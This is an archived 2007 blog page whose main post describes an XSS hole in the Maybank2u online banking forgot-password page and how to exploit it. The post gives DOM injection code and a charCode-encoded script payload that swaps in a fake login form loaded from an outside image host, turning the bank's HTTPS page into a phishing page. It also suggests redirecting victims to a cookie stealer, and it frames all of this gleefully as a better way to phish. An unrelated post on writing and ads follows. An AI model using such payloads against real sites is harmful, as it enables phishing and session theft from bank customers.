Ads by Google

Convert

Convert Video to DVD

Convert PDF to JPEG

3G2 Convert OGM

Avi Convert Mov

Blogeek
where geeks play Home Pr0ject Tutorial Comic Fellowship About

Subscribe
RSS Feed-Posts RSS Feed-Comments September 2007 M T WT F S S 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 « Aug

Categories
Education (4) Entertainment (2) Firefox (1) Games (2) Jokes (5) Lifelog (13) Linux (1) Security (5) Whatever (1) Windows (1)

Archives
September 2007 August 2007 July 2007 June 2007 May 2007 April 2007
Beloved Readers
You! Join Our Community syahrul

syahrul niezam Buy online cheap Cytotec menteil Encik Marzuki First L Raja Munirah frz703 free
View Reader Community Join this Community (provided by MyBlogLog)

« Older Loading Newer »

Rob Maybank2u with javascript
Published September 5th, 2007 in Security. 0 Comments

I’m back. Now with another evil plan in mind.*grin* I found a XSS hole in maybank2u online right in the https secured section. It seems that Maybank2u use javascript to validate and filter user input in forgot password page, before echoing it back. This can be easily evaded by sending the input not to the textbox, but straight to the URL bar. As a result, user can inject javascript code into the page by changing the birthday’s date value. Funny isn’t it? XSS in maybak2u online POC What can we do with a xssed site? It’s an online banking site dude, why not setting up a phishing site right there? First we need to remove the old content [forgot password form] using getElementByTagName. Fire up your DOM Inspector in Firefox and you should find that the form is in the 4th table. Replace the form HTML code with innerHTML command. The whole code that we’re going to inject should be something like this. oldcontent= document.getElementsByTagName(”table”)[3]; oldcontent.innerHTML=’<–phising code goes here–>’; Convert the string to charCode String.fromCharCode(60,115,99,114,105,112,116,62,109,121,80,61,32,100,111,99,117,109, 101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109, 101,40,34,116,97,98,108,101,34,41,91,51,93,59,109,121,80,46,105,110,110,101,114,72,84, 77,76,61,39,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,105,109,103,49, 55,48,46,105,109,97,103,101,115,104,97,99,107,46,117,115,47,105,109,103,49,55,48,47, 57,50,55,53,47,108,111,103,105,110,108,107,52,46,106,112,103,62,39,59,60,47,115,99, 114,105,112,116,62)

Yatta! A new phising site hosted by maybank2u itself with zero cent cost and it’s https verified. [Tested only in Firefox]

Downside is, the URL is obviously long. Notice that the login form is just an image. I’m lazy, and it can be better if you copy the HTML code from the real page. Keep in mind that the longer your phishing code, the longer the URL will be. If you don’t want to create a phishing site, you can just redirect the victim to a cookie stealer. Set the cookie back to your browser and you’ll have 10 minutes login time. Maybank users, you don’t have to be worry since any money transaction need TAC code. I told you earlier this is just a proof of concept. Haha. This article is for educational purpose only. Whatever you do, you’re on your own. To Mr.Fark: This is the better way to phish. Not the lame way that you did last time.
Download Video Converter
Convert MOV to AVI DVD MPEG WMV Convert All Popular Media File Type www.avs4you.com/AVS-Video-Converter

We convert videos to DVDs
Conversion of most video formats Conversion of pictures to DVDs www.dmoftexas.com

Teach me to write
Published August 18th, 2007 in Education. 0 Comments

Remember back in time when I decided to create my first blog, hoping I could improve my English. Starting on that day, I had spent most of my free time reading and publishing post until it has become one of my life routine. The problem is, not all bloggers can write well and use the correct grammar, including myself. I have to admit that. By reading that kind of writing, it will just poison your mind and damage you English skills. Sometimes I can’t keep myself from laughing when reading blog with poor grammar. Did they just copy and paste the article to Google translator? I wonder if my readers think the same way on me. Now I’ll tell you my lame technique that I’ve been using for a long period of time. Every time I write a new post, I’ll reread it for a few times, paste it in MS word and scan for spelling errors. I’ll use Google to make sure that I’m using the accurate words or phrases. My electronic dictionary and online Thesaurus are also come in handy. I know that some readers don’t even care about grammar errors as they only interested with the content. For me, both are important because the way you write shows the way you think. Plus, if you don’t know how to write well, you might mislead the readers with the wrong ideas. Care to share your writing technique?
Adobe University Software
Campus Productivity & Collaboration Solutions, Download the PDF Now! www.Adobe.com/Education

Video Transfers to DVD
VHS, BETA, Camcorder, Film Reels 35mm negatives, slides, slideshows www.memories2dvd.ca

Search

Recent Posts
Rob Maybank2u with javascript Teach me to write Analogy of a transistor Bored? Try this Hi, my name is Pudge and I’m overweight

Recent Comments
flisterz on Bored? Try this Hertz on Pownce pwned tk2 on Bored? Try this adq890 on Bored? Try this xenowork on Hi, my name is Pudge and I'm overweight

AVI to DVD Creator Easily convert your AVI files to movie DVD. Free to try!
smartDVDcreator.com

Convert VHS to DVD Easily Fast & Simple DVDs of Home Videos Easy to Install Hardware & Software
www.Roxio.com

VOB to AVI Converter Download free software to convert VOB videos to AVI file format.
video.nchsoftware.co…

DWG to PDF Free Trial Batch, Combine, Stamp, and more. Includes PDF editor to markup PDFs.
www.bluebeam.com

Blogeek is powered by WP and K2 RSS Entries and RSS Comments